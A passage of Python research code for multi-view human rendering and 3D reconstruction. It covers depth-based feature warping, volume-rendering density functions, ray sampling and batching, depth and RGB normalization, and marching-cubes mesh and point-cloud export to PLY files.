\\\n predicted_rgbs, predicted_depths, input_normals = \\\n visuals['rgbs'], visuals['_r_depths'], visuals['masks'], \\\n visuals['target_rgbs'], visuals['target_depths'], visuals['target_masks'], \\\n visuals['_rgbs'], visuals['_depths'], visuals['_r_normals'];\n \n # inputs resize, only when resolution 1K.\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_normals = input_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n target_depths = target_depths.view(-1, 1, opts.img_size, opts.img_size)\n \n predicted_rgbs = predicted_rgbs.view(-1, opts.img_size, opts.img_size, 3)\n predicted_depths = predicted_depths.view(-1, 1, opts.load_size, opts.load_size);\n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths, opts.valid_depth_min, opts.valid_depth_max)\n # input_depths,[B,N,1,H,W]\n # normalize the target depths.\n target_depths, _, _, _ = _depth_normalizer(target_depths, opts.valid_depth_min, opts.valid_depth_max)\n \n predicted_rgbs_ = predicted_rgbs[0].detach().cpu().numpy() * 255.0\n predicted_depths_ = predicted_depths[0,0].detach().cpu().numpy()\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n # _depths.append( _input_depth * 255.0 )\n _depths.append( input_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n predicted_depths_ = np.clip( (predicted_depths_ + 1)*0.5, 0, 1)\n predicted_depths_ = np.stack([predicted_depths_]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n\n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, _target_depths, predicted_depths_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n \n # Image.fromarray( rgbs.astype(np.uint8) ).save(save_path_rgb)\n # Image.fromarray( _rgbs.astype(np.uint8) ).save(save_path_rgb_)\n # cv2.imwrite( save_path_depth, depths.astype(np.uint16) )\n # cv2.imwrite( save_path_depth_, _depths.astype(np.uint16) )\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n\n# e.g., get features from other four neighborviews\ndef warp_func(o_d, t_d, o_k, o_rt, t_ks, t_rts, t_feats, get_im=False, d_thresh=0.01, warp_d_thresh=0.03):\n # o_d : [B*1, 1, H, W], o_k(rt): [B*1, 3, 3(4)]\n # t_d : [B*N_nei, 1, H, W], t_feats : [B*N_nei, 3, HH, WW]\n # given source depth and k,rt matrix, warp target features given target k & rt matrix.\n # print(o_d.shape, t_d.shape, o_k.shape, t_ks.shape, t_feats.shape)\n B, _, H, W = o_d.shape # target depth only contain one view.\n HH, WW = t_feats.shape[-2:]\n num_neighbors_views = t_d.shape[0] // B\n \n ys, xs = torch.meshgrid( torch.arange(0, H, device=o_d.device, dtype=o_d.dtype), # [H, W]\n torch.arange(0, W, device=o_d.device, dtype=o_d.dtype) )\n ys, xs = ys.reshape(-1), xs.reshape(-1) # [h*w]\n # transform to the camera coordinate.\n xyz = torch.stack( [xs, ys, torch.ones_like(xs)], dim=0 ) # [3, H*W]\n xyz = xyz.view(1,3,-1).repeat(B,1,1) # [B,3,H*W]\n XYZ = (torch.inverse(o_k) @ xyz) * o_d.view(B,1,-1) # [B,3,H*W] * [B,1,H*W] -> [B,3,H*W]\n # transform to world positions, if depth is 0 he re, the returned pos is the camera's position.\n XYZ = torch.inverse(o_rt[:,:3,:3]) @ (XYZ - o_rt[:,:3,-1:]) # [B,3,3] * [B,3,H*W] -> [B,3,H*W]\n XYZ_ = XYZ.view(B,1,3,-1).repeat(1,num_neighbors_views,1,1).view(-1,3,H*W) # [B*N_v,3,H*W]\n # project to other views.\n xyz_t = t_rts[...,:3] @ XYZ_ + t_rts[...,-1:] # [B*N_v,3,H*W]\n p_d = xyz_t[:,-1:,:].clone() # [B*N_v, 1, H*W]\n # set the invalid depth to -1.\n invalid = p_d <= d_thresh # [B*N_v, 1, H*W]\n p_d_ori = p_d.clone() # original depths.\n p_d[invalid] = 1\n \n xyz_t /= p_d # [x / d, y / d, 1.];\n pts_screen = t_ks @ xyz_t # [B*Nv, 3, h*w]\n # transform to [-1,1], unvalid regions are masked as -2;\n grids = (pts_screen[:,:2] - H // 2) / (H // 2) # [-1, 1] [B*Nv, 2, h*w], H==W here\n grids[invalid.repeat(1,2,1)] = -1\n grids = grids.permute(0,2,1)[:,:,None] # [B*Nv, h*w,1,2]\n \n # get visible masks.\n # step0. get the target depth values\n t_d_warp = F.grid_sample(t_d, grids, mode='nearest', align_corners=True)[..., 0] # [b*Nv, 1, h*w]\n in_visi_labels = (t_d_warp - p_d_ori).abs() > warp_d_thresh # [B*N_v, 1, H * W]\n grids[in_visi_labels.permute(0, 2, 1)] = -1 # mark the invisible regions as -2;\n grids_maps = grids[:,:,0].permute(0,2,1).view(-1,2,H,W) # [B*Nv, 2, h, w]\n grids_maps = F.interpolate(grids_maps, (HH, WW), mode='bilinear') # [B*Nv, 2, h, w]\n \n if get_im:\n grids = grids_maps.view(B*num_neighbors_views, 2, -1).permute(0,2,1)[:,:,None]\n # the warpped features, all regions are valid now, then warpping.\n t_feats = torch.cat( [t_feats, torch.ones_like(t_feats[:,:1,...])], dim=1 )\n warped_feats = F.grid_sample(t_feats, grids, mode='bilinear', align_corners=True)[..., 0] # [B*Nv, c, h*w]\n warped_feats = warped_feats.view(t_ks.shape[0], -1, HH, WW) # B*Nnei, C+1. H, W\n mask = warped_feats[:, -1:].clone() # valid regions.\n warped_feats = warped_feats[:, :-1] * mask\n return grids_maps, warped_feats\n \n # cv2.imwrite( './visi_mask.png', ( (1 - in_visi_labels.view(-1, 1, H, W).int()[0,0].detach().cpu().numpy()) * 255).astype(np.uint8) )\n # cv2.imwrite( './warped_feats.png', ( warped_feats[0].permute(1,2,0).detach().cpu().numpy() * 255).astype(np.uint8)[..., ::-1] )\n # exit()\n # return warped_feats, t_d_ori.view(-1, 1, H, W), in_visi_labels.view(-1, 1, H, W).int(), grids # [B*Nv, h*w, 1, 2]\n return grids_maps\n\n\ndef warp_func_features( feats, grids, B, Nv ):\n _,C,H,W = feats.shape\n grids_ = grids.view(B*Nv, 2, -1).permute(0,2,1)[:,:,None] # [BNv,h*w,1,2]\n t_feats = torch.cat( [feats, torch.ones_like(feats[:,:1,...])], dim=1 )\n warped_feats = F.grid_sample(t_feats, grids_, mode='bilinear', align_corners=True)[..., 0] # [B*Nv, c+1, h*w]\n warped_feats = warped_feats.view(B*Nv, -1, H, W) # B*Nv, C+1. H, W\n mask = warped_feats[:, -1:].clone() # valid regions.\n warped_feats = warped_feats[:, :-1] * mask\n return warped_feats\n\ndef proj_persp(points, K, R, T, p_depths, n_views, depth_thres=0.01, min_d=0.1, max_d=4.0, res=512):\n # points: [B, 3, N_point]\n # p_depths: [B, 1, N_point]\n if p_depths is not None:\n invalid_d = (p_depths < min_d) | (p_depths > max_d) # [B', 1, N_point]\n points = points[:, None].repeat(1, n_views, 1, 1).view(-1, *points.shape[-2:])\n \n pts = R @ points + T # [B*N_v, 3, N]\n # To screen coordinate\n ori_pts = pts.clone() # [B*N_v, 3, N]\n depth = pts[:, -1:, :].clone() # [B*N_v, 1, N]\n invalid = depth < depth_thres # invalid depth values.\n depth_ = depth.clone() # get depth values.\n depth_[invalid] = 1 # assign with 1, don't divide by this depth value.\n \n if p_depths is not None:\n invalid_d = invalid_d[:, None].repeat(1, n_views, 1, 1).view(-1, 1, invalid_d.shape[-1]) # [BNv, 1, N_rays]\n depth[invalid_d] = -2\n \n pts /= depth_ # [x / d, y / d, 1.];\n pts_screen = K @ pts # [f1 * x / d + f_x, f2 * y / d + f_y]\n pts_screen = pts_screen[:, :2, :] # [B, 2, N_p]\n # in dataset, the intrinsic matrix has been normalized to [f1 / fx, f2 / fy, 1], -> [-1,1]\n grids = (pts_screen - res // 2) / (res // 2) # to [-1,1] [B, 2, N]\n # invalid_ = invalid.repeat(1,2,1)[..., None].repeat(1,1,1,4).view(-1, 2, grids.shape[-1])\n grids[invalid.repeat(1,2,1)] = -2 # invalid with -1.\n if p_depths is not None:\n grids[invalid_d.repeat(1,2,1)] = -2;\n \n return ori_pts, grids, depth\n\n\n# density properties: beta_init, beta_min;\nclass Density(nn.Module):\n def __init__(self, params_init={}):\n super().__init__()\n for p in params_init:\n param = nn.Parameter(torch.tensor(params_init[p]))\n setattr(self, p, param)\n\n def forward(self, sdf, beta=None):\n return self.density_func(sdf, beta=beta)\n\n# density\n# {\n# params_init{\n# beta = 0.1\n# }\n# beta_min = 0.0001\n# }\n\n# density func: alpha * (0.5 + 0.5 * udf)\nclass LaplaceDensity(Density): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, params_init={}, beta_min=0.0001, device='cuda:0'):\n super().__init__(params_init=params_init)\n self.beta_min = torch.tensor(beta_min, device=device)\n\n def density_func(self, sdf, beta=None):\n # sdf = 1/beta * ();\n if beta is None:\n beta = self.get_beta()\n\n alpha = 1 / beta\n return alpha * (0.5 + 0.5 * sdf.sign() * torch.expm1(-sdf.abs() / beta))\n\n def get_beta(self):\n beta = self.beta.abs() + self.beta_min\n return beta\n \n# my density func, regard as a smooth function for volume rendering.\nclass MyLaplaceDensity(nn.Module): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, opts, device='cuda:0'):\n super(MyLaplaceDensity, self).__init__()\n self.register_parameter( 'beta', nn.Parameter(torch.tensor(opts.beta_init)) ) # default as 0\n self.beta_min = torch.tensor(opts.beta_min, device=device) # default as 1 / 10000.0\n # self.beta_max = torch.tensor(opts.beta_max, device=device) # default as 1 / 1000.0\n\n def density_func(self, occ, beta=None):\n # transform occ to robust sdf.\n # inside : -0.5, outside 0.5;\n \n _sdf = occ - 0.5 # [-0.5, +0.5]\n if beta is None:\n beta = self.get_beta() # the beta, such as 0.01\n\n alpha = 1 / beta # alpha <= 1/ beta; the default alpha can be set as 100 as max alpha;\n # for sdf <= 0, density = 0.5 * exp( sdf / beta ) / beta;\n # for sdf > 0, density = (1 - 0.5 * exp( - sdf / beta )) / beta;\n # 0.5 - 0.5 * (exp(-sdf/beta) - 1) -> 1 - 0.5 * exp( - sdf / beta ); ( >0);\n # 0.5 + 0.5 * (exp(sdf / beta) - 1) -> 0.5 * exp( sdf / beta ); ( <= 0)\n return alpha * (0.5 - 0.5 * _sdf.sign() * torch.expm1(-_sdf.abs() / beta))\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_beta(self):\n # limit the beta. [0.0001, 0.001];\n beta = self.beta_min + self.beta.abs()\n return beta\n \n# occ to density functions.\nclass OccDensity(nn.Module): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)\n def __init__(self, opts, device='cuda:0'):\n super(OccDensity, self).__init__()\n self.register_parameter( 'beta', nn.Parameter(torch.tensor(opts.beta_init)) ) # default as 0.1\n self.beta_min = torch.tensor(opts.beta_min, device=device) # default as 0.0001\n\n def density_func(self, occ, beta=None):\n if beta is None:\n beta = self.get_beta()\n\n # alpha = 1 / beta, the density = alpha * occ\n return occ / beta\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_beta(self):\n beta = self.beta.abs() + self.beta_min\n return beta\n \n\nclass TempGrad(object):\n \n def __enter__(self):\n self.prev = torch.is_grad_enabled() # get previous gradients.\n torch.set_grad_enabled(True) # temp gradient enable.\n \n def __exit__(self, exc_type, exc_value, traceback):\n torch.set_grad_enabled(self.prev) # recover the previous states for gradients.\n\n\n# when UDF -> 0, the density -> +inf;\nclass LogisticDensity(nn.Module): # density value: s * e^{-s*udf} / (1+e^{-s*udf})^2\n \n def __init__(self, opts, device):\n super(LogisticDensity, self).__init__()\n # the paramter is initialized with 0.01, reload model will update the s.\n self.register_parameter('s', nn.Parameter(torch.tensor(opts.s_init)) )\n self.s_min = torch.tensor(opts.s_min, device=device)\n \n def density_func(self, udf):\n s = self.get_s()\n # print('s_min:', self.s_min.cpu(), ', s_now:', self.s.cpu())\n # during training, the s gradually becomes larger.\n return s * torch.exp(-s*udf) / (1 + torch.exp(-s*udf))**2\n \n def forward(self, x):\n return self.density_func(x)\n\n def get_s(self):\n s = self.s_min + self.s.abs()\n return s\n\n\n# 1. the batchify rays volume rendering functions.\n@torch.no_grad()\ndef generate_rays(ks, rs, ts, res, masks=None, body_bbox=None, num_sampled_rays=1024, in_patch=False, in_bbox=False, device='cuda:0'):\n \n if num_sampled_rays is None: # when inference, get all rays for sampling.\n gpu_id = int(str(device).split(':')[-1]) # 0 or 1\n # sampled rays. [B, N_v, H, W, 6]\n ray_ori_dir = VoxelEncoding.rays_calculating(ks, rs, ts, res, gpu_id) # ~0.5ms\n ray_ori_dir = ray_ori_dir.view(ks.shape[0], -1, ray_ori_dir.shape[-1]) # [B, -1, 6]\n return ray_ori_dir, None # no need for xy.\n \n # sampling rays inside the masks, and sampling indeed num_rays. ~ 2ms.\n sampled_rays, sampled_xy = ray_sampling(ks, rs, ts, res, num_sampled_rays, masks, in_patch, in_bbox, body_bbox)\n sampled_rays = sampled_rays.view(sampled_rays.shape[0], -1, 6) # [B, N_rays, 6]\n \n return sampled_rays, sampled_xy\n\n\n@torch.no_grad()\ndef batchify_rays(batch_rays, num_sampled_rays, target_num_views):\n # batch_rays: [B, N_rays, 6]\n batch_rays_batchified = []\n num_total_rays = batch_rays.shape[1] # suppose as N_v * H * W;\n num_batch_rays = num_sampled_rays * target_num_views # when inference, num of the target views is 1;\n num_batches = num_total_rays // num_batch_rays; # get the num of rays, may not enough here.\n # _batch_rays = batch_rays.view(batch_rays.shape[0], num_batch_rays, num_batches, 6).permute(2,0,1,3); # [N_b, B, N_rays, 6];\n\n for i in range(num_batches):\n batch_rays_batchified.append( batch_rays[:, i*num_batch_rays:(i+1)*num_batch_rays, ].contiguous() )\n # when the batchied rays are not in sequtial for all rays.\n left_rays = num_total_rays - num_batch_rays * num_batches\n if left_rays > 0:\n batch_rays_batchified.append( batch_rays[:, num_batch_rays*num_batches:, ].contiguous() )\n \n # [[B, N_rays*1, 6], ...]\n # for i in range(num_batches):\n # batch_rays_batchified.append( _batch_rays[i] )\n \n return batch_rays_batchified\n\ndef high_res_rgbs_images_mean(rgbs_fold):\n # rgbs fold data, rgbs_fold : [B, N_v, 12, h, w]\n rgbs_chanel = rgbs_fold.shape[2] // 3\n # get the rgbs mean data in channels.\n rgbs_mean = torch.stack( [rgbs_fold[:,:, :rgbs_chanel].mean(dim=2), \n rgbs_fold[:,:, rgbs_chanel:rgbs_chanel*2].mean(dim=2), \n rgbs_fold[:,:, rgbs_chanel*2:].mean(dim=2)], dim=2 )\n return rgbs_mean\n\n\ndef high_res_rgbs_rays_mean(rgbs_fold):\n # rgbs fold data, rgbs_fold : rays [B, N_rays, 12]\n rgbs_chanel = rgbs_fold.shape[-1] // 3\n # get the rgbs mean data in channels.\n rgbs_mean = torch.stack( [rgbs_fold[..., :rgbs_chanel].mean(dim=-1), \n rgbs_fold[..., rgbs_chanel:rgbs_chanel*2].mean(dim=-1), \n rgbs_fold[..., rgbs_chanel*2:].mean(dim=-1)], dim=-1 )\n return rgbs_mean\n\n\ndef l2_normalize(x):\n # x : [..., 3].\n normalized_x = x / ( x.norm(2, dim=-1).unsqueeze(-1) + 1e-5 )\n return normalized_x\n\n# 2. normalizer or other properties.\ndef rgb_normalizer(rgb_tensors, mask_tensors, mid=0.5, dist=0.5):\n # rgbs: [B, 3, H, W]; masks : [B, 1, H, W];\n tmp = (rgb_tensors - mid) / dist; # [-1, 1], rgb normalization.\n tmp *= mask_tensors # mask the back ground to 0.\n return tmp\n\ndef depth_normalizer(depth_tensors, mid, dist):\n # depth tensors: [B, N_v, N_rays, N_sampled, 1]\n # mid, dist : [B, N_v, ....]\n # step 1. expanding.\n if len(depth_tensors.shape) == 5:\n mid = mid[..., None];\n mid_expand = mid.expand_as(depth_tensors)\n if type(dist) == torch.Tensor:\n dist = dist[..., None]; # [B, N_v, 1, 1, 1]\n assert len(depth_tensors.shape) == len(mid.shape) == len(dist.shape), \"unsupported invalid shape.\"\n dist_expand = dist.expand_as(depth_tensors)\n return (depth_tensors - mid_expand) / (dist_expand / 2.0)\n else:\n return (depth_tensors - mid_expand) / dist # the dist is float value.\n \n else: # [B*N_v, N_p, 1]\n b, n_v = mid.shape[:2]\n depth_tensors = depth_tensors.view(b, n_v, -1, 1)\n mid_expand = mid.expand_as(depth_tensors)\n if type(dist) == torch.Tensor:\n dist_expand = dist.expand_as(depth_tensors)\n depth_normalized = (depth_tensors - mid_expand) / (dist_expand / 2.0)\n else:\n depth_normalized = (depth_tensors - mid_expand) / dist\n \n # reshape to [BN_v, N_points, 1]\n depth_normalized = depth_normalized.view(b*n_v, -1, 1)\n return depth_normalized\n\ndef normalize_rgbd(rgbs, depths, depth_normalizer):\n rgb_mean = torch.Tensor((0.485, 0.456, 0.406)).view(1, 3, 1, 1)\n rgb_std = torch.Tensor((0.229, 0.224, 0.225)).view(1, 3, 1, 1)\n \n depths_normalized, _, depth_mid, depth_dist = depth_normalizer( depths ) # to [-0.5, 0.5]\n rgbs_normalized = (rgbs - rgb_mean.type_as(rgbs)) / rgb_std.type_as(rgbs) # standard normalization.\n return depths_normalized, depth_mid, depth_dist, rgbs_normalized\n\n\ndef unnormalize_depth(depths, mids, dists):\n b,c,h,w = depths.shape\n mids_ = mids.view(-1); \n dists_ = dists.view(-1);\n depths_un = depths.clone()\n # unormalize-depths, the encoder -> (d - mids) / (dists / 2.0)\n for i in range(b):\n depths_un[i] = depths[i] * dists_[i] + mids_[i] # d_un = d' * (dists / 2.0) + mids.\n \n return depths_un\n\ndef z_normalizer(z, mid, dist):\n b, n_v = mid.shape[:2]\n z = z.view(b, n_v, -1, 1)\n mid_expand = mid.expand_as(z)\n dist_expand = dist.expand_as(z)\n z_normalized = (z - mid_expand) / (dist_expand / 2.0)\n z_normalized = z_normalized.view(b*n_v, -1, 1)\n return z_normalized\n\n\nclass _trunc_exp(Function):\n @staticmethod\n @custom_fwd(cast_inputs=torch.float32) # cast to float32\n def forward(ctx, x):\n ctx.save_for_backward(x)\n return torch.exp(x)\n\n @staticmethod\n @custom_bwd\n def backward(ctx, g):\n x = ctx.saved_tensors[0]\n return g * torch.exp(x.clamp(-15, 15))\n\n\ntrunc_exp = _trunc_exp.apply\n\n\n### other funcs:\ndef to_pcd_mesh(tsdf_vol, color_vol, bbox, voxel_size):\n tsdf = tsdf_vol[0].cpu().numpy()\n color = color_vol[0].cpu().numpy()\n vol_bbox = bbox[0, :, 0].cpu().numpy()\n voxel_size = voxel_size[0, 0].cpu().numpy() # the voxel's size;\n pc = get_point_cloud(tsdf, color, vol_bbox, voxel_size)\n verts, faces, norms, colors = get_mesh(tsdf, color, vol_bbox, voxel_size)\n pcwrite('./pc_all0.ply', pc)\n meshwrite('./mesh_all0.ply', verts, faces, norms, colors)\n\ndef get_point_cloud(tsdf_vol, color_vol, vol_bbox, voxel_size):\n \"\"\"Extract a point cloud from the voxel volume.\n \"\"\"\n from skimage import measure\n\n # Marching cubes\n verts = measure.marching_cubes_lewiner(tsdf_vol, level=0)[0] # verts is float values.\n verts_ind = np.round(verts).astype(int)\n verts = verts * voxel_size + vol_bbox\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:, 0], verts_ind[:, 1], verts_ind[:, 2]]\n colors_b = np.floor( rgb_vals / 256 )\n colors_g = np.floor((rgb_vals - colors_b * 256) / 256)\n colors_r = rgb_vals - colors_b*256 - colors_g*256\n colors = np.floor(np.asarray([colors_b, colors_g, colors_r])).T\n colors = colors.astype(np.uint8)\n\n pc = np.hstack([verts, colors])\n return pc\n\ndef get_mesh(tsdf_vol, color_vol, vol_bbox, voxel_size):\n \"\"\"Compute a mesh from the voxel volume using marching cubes.\n \"\"\"\n from skimage import measure\n\n # Marching cubes\n verts, faces, norms, vals = measure.marching_cubes_lewiner(tsdf_vol, level=0)\n verts_ind = np.round(verts).astype(int)\n verts = verts * voxel_size + vol_bbox\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:,0], verts_ind[:,1], verts_ind[:,2]]\n colors_b = np.floor(rgb_vals/256)\n colors_g = np.floor((rgb_vals-colors_b*256)/256)\n colors_r = rgb_vals-colors_b*256-colors_g*256\n colors = np.floor(np.asarray([colors_r,colors_g,colors_b])).T\n colors = colors.astype(np.uint8)\n \n return verts, faces, norms, colors\n\ndef pcwrite(filename, xyzrgb):\n \"\"\"Save a point cloud to a polygon .ply file.\n \"\"\"\n xyz = xyzrgb[:, :3]\n rgb = xyzrgb[:, 3:].astype(np.uint8)\n\n # Write header\n ply_file = open(filename,'w')\n ply_file.write(\"ply\\n\")\n ply_file.write(\"format ascii 1.0\\n\")\n ply_file.write(\"element vertex %d\\n\"%(xyz.shape[0]))\n ply_file.write(\"property float x\\n\")\n ply_file.write(\"property float y\\n\")\n ply_file.write(\"property float z\\n\")\n ply_file.write(\"property uchar red\\n\")\n ply_file.write(\"property uchar green\\n\")\n ply_file.write(\"property uchar blue\\n\")\n ply_file.write(\"end_header\\n\")\n\n # Write vertex list\n for i in range(xyz.shape[0]):\n ply_file.write(\"%f %f %f %d %d %d\\n\"%(\n xyz[i, 0], xyz[i, 1], xyz[i, 2],\n rgb[i, 0], rgb[i, 1], rgb[i, 2],\n ))\n \ndef meshwrite(filename, verts, faces, norms, colors):\n \"\"\"Save a 3D mesh to a polygon .ply file.\n \"\"\"\n # Write header\n ply_file = open(filename,'w')\n ply_file.write(\"ply\\n\")\n ply_file.write(\"format ascii 1.0\\n\")\n ply_file.write(\"element vertex %d\\n\"%(verts.shape[0]))\n ply_file.write(\"property float x\\n\")\n ply_file.write(\"property float y\\n\")\n ply_file.write(\"property float z\\n\")\n ply_file.write(\"property float nx\\n\")\n ply_file.write(\"property float ny\\n\")\n ply_file.write(\"property float nz\\n\")\n ply_file.write(\"property uchar red\\n\")\n ply_file.write(\"property uchar green\\n\")\n ply_file.write(\"property uchar blue\\n\")\n ply_file.write(\"element face %d\\n\"%(faces.shape[0]))\n ply_file.write(\"property list uchar int vertex_index\\n\")\n ply_file.write(\"end_header\\n\")\n\n # Write vertex list\n for i in range(verts.shape[0]):\n ply_file.write(\"%f %f %f %f %f %f %d %d %d\\n\"%(\n verts[i,0], verts[i,1], verts[i,2],\n norms[i,0], norms[i,1], norms[i,2],\n colors[i,0], colors[i,1], colors[i,2],\n ))\n\n # Write face list\n for i in range(faces.shape[0]):\n ply_file.write(\"3 %d %d %d\\n\"%(faces[i,0], faces[i,1], faces[i,2]))\n\n ply_file.close()\n\ndef draw_octree_nodes(nodes, indexs, _ray_ori, _ray_dir, sampled_depths, _idx, _sampled_idx):\n import open3d as o3d\n mesh_all = []\n # print(indexs, nodes.shape)\n # exit()\n\n # nodes0 = nodes[:indexs[3]].cpu().numpy() # [3, N]\n # nodes0 = nodes[indexs[1]:indexs[2]].cpu().numpy() # [3, N]\n # nodes0 = nodes[indexs[0]:indexs[1]].cpu().numpy() #[3, N]\n nodes0 = nodes[:].cpu().numpy() # [3, N]\n # nodes0 = nodes[indexs[1]:].cpu().numpy()\n # nodes0 = nodes[:indexs[1]].cpu().numpy()\n _idx = _idx.cpu().numpy()[0, 200]\n _sampled_idx = _sampled_idx.cpu().numpy()[0, 200]\n\n tmp = 0\n all_points = []\n all_lines = []\n all_colors = []\n # basic_color = [20/255,70/255, 77/255]; highlighted_color = [100/255,140/255, 147/255]\n basic_color = [50/255,100/255, 107/255]; highlighted_color = [100/255,140/255, 147/255]\n # basic_color = [80/255,80/255,80/255]; highlighted_color = [120/255,120/255,120/255];\n new_color = [0,0,1]\n for i in range(nodes0.shape[0]):\n node = nodes0[i] # 5.x,y,z,size,b\n # if node[-2] == 1 and node[-1] == 0 and i in _sampled_idx: # batch id ==0 && valid.\n # view all the points for sampled_idx != 0;\n if node[-2] == 1 and node[-1] == 0: # batch id ==0 && valid.\n points = []\n for k in range(-1,3,2):\n for m in range(-1,3,2):\n for n in range(-1,3,2):\n points.append([node[0]+k*node[3]/2, node[1]+m*node[3]/2, node[2]+n*node[3]/2])\n points = np.array(points) # [8,3]\n all_points.append(points)\n lines = np.array([[0,1], [2,3], [4,5], [6,7], [0,4], [1,5],[2,6],[3,7],[0,2],[1,3],[4,6],[5,7]]) + tmp*8 # [12,2]\n all_lines.append(lines)\n tmp +=1\n\n # if i in [_sampled_idx[-1]]: # the intersected voxels\n # all_colors.append(np.stack([np.array(new_color)]* lines.shape[0], axis=0))\n # continue;\n \n if i in range(indexs[1],nodes0.shape[0]):\n all_colors.append(np.stack([np.array(highlighted_color)]* lines.shape[0], axis=0))\n else:\n all_colors.append(np.stack([np.array(basic_color)]* lines.shape[0], axis=0))\n\n all_points = np.concatenate(all_points, axis=0)\n all_lines = np.concatenate(all_lines, axis=0)\n # all_colors = np.array([[0.4,0.4,0.4] for i in range(all_lines.shape[0])])\n all_colors = np.concatenate(all_colors, axis=0)\n # print(all_points.shape, all_lines.shape, all_colors.shape)\n # octree.\n lines_pcd = o3d.geometry.LineSet()\n lines_pcd.lines = o3d.utility.Vector2iVector(all_lines)\n lines_pcd.colors = o3d.utility.Vector3dVector(all_colors)\n lines_pcd.points = o3d.utility.Vector3dVector(all_points)\n # mesh\n mesh = o3d.io.read_triangle_mesh('./mesh_all0.ply', False)\n pcds = o3d.io.read_point_cloud('./pc_all0.ply')\n # pcds = o3d.io.read_triangle_mesh('./realtime_pifu_3571.obj', False)\n # pcds = o3d.io.read_point_cloud('/home/yons/my_Rendering/HumanRendering/depths_input/22_0401_data1_v3_all.ply')\n # pcds = o3d.io.read_point_cloud('/home/yons/my_Rendering/HumanRendering/depths_input/FRAME3587_all.ply')\n\n # draw rays.\n ray_ori = _ray_ori[0, 200, :].cpu().detach().numpy() # [3]\n ray_dir = _ray_dir[0, 200, :].cpu().detach().numpy() # [3]\n ray_len = 3\n ray_end = ray_ori + ray_len * ray_dir\n line_ray = o3d.geometry.LineSet()\n line_ray.lines = o3d.utility.Vector2iVector(np.array([[0,1]]))\n line_ray.colors = o3d.utility.Vector3dVector(np.array([[0.05,0.05,0.05]]))\n line_ray.points = o3d.utility.Vector3dVector(np.stack([ray_ori, ray_end], axis=0))\n\n # draw sampled points, the sampled points.\n sampled_z = sampled_depths[0, 200].cpu().numpy()\n sampled_points = ray_ori[:, None] + ray_dir[:, None] * sampled_z\n sampled_pcds = o3d.geometry.PointCloud()\n sampled_points = o3d.utility.Vector3dVector(sampled_points.T)\n sampled_pcds.points = sampled_points\n \n o3d.visualization.draw_geometries([lines_pcd, line_ray, sampled_pcds, pcds])\n\n # o3d.visualization.draw_geometries([lines_pcd, line_ray, sampled_pcds])\n # vis = o3d.visualization.Visualizer()\n # vis.create_window()\n # render_opt = vis.get_render_option()\n # render_opt.point_size = 0.2\n # render_opt.background_color = np.array([239/255, 244/255, 244/255])\n # # render_opt.background_color = np.array([219/255, 224/255, 244/255])\n # vis.add_geometry(lines_pcd)\n # # vis.add_geometry(pcds)\n # vis.add_geometry(line_ray)\n # vis.add_geometry(sampled_pcds)\n # # o3d.visualization.draw_geometries([lines_pcd, pcds])\n # vis.run()\n\n########################## for geometries ########################\n \ndef gen_mesh(opts, model, val_data, device, epoch, use_octree=True):\n # get bbox for generate data.\n bbox_min = np.array( opts.bbox_min ) # [1, 3]\n bbox_max = np.array( opts.bbox_max ) # [1, 3]\n # get the path.\n mesh_dir = os.path.join(opts.model_dir, 'val_results')\n make_dir(mesh_dir)\n geo_save_path = os.path.join(mesh_dir, '{}_epoch{}.obj'.format(val_data['name'][0], epoch))\n \n t0 = time.time()\n with torch.no_grad():\n verts, faces = reconstruction(opts, model, device, opts.num_views, opts.resolution, \n bbox_min, bbox_max, use_octree=use_octree)\n t1 = time.time()\n print( 'Time for predict sdf field: {}'.format(t1 - t0) )\n\n save_obj_mesh(geo_save_path, verts, faces)\n\n\ndef eval_func(opts, model, num_views, points, device):\n points = np.expand_dims(points, axis=0) # [1, 3, N_Points.]\n if not opts.is_train: # especially for the front-face,\n points = np.concatenate([points] * num_views, axis=0) # [N_view * 1, 3, N_points]; {front_view; other 3 views};\n else:\n points = np.concatenate([points] * num_views, axis=0) # [N_view * 1, 3, N_points]; {front_view; other 3 views};\n\n samples = torch.from_numpy(points).to(device=device).float() # [N1, 3, N2].\n model.forward_query_occ(samples) # [[B, 1, N_points] * Stages.] -> [1, N_points]\n pred = model._predicted_occ[0] # select the first one.\n return pred.detach().cpu().numpy()\n \n\ndef reconstruction(opts, model, device, num_views, resolution, bbox_min, bbox_max, \n use_octree=True, num_sample_batch=10000): 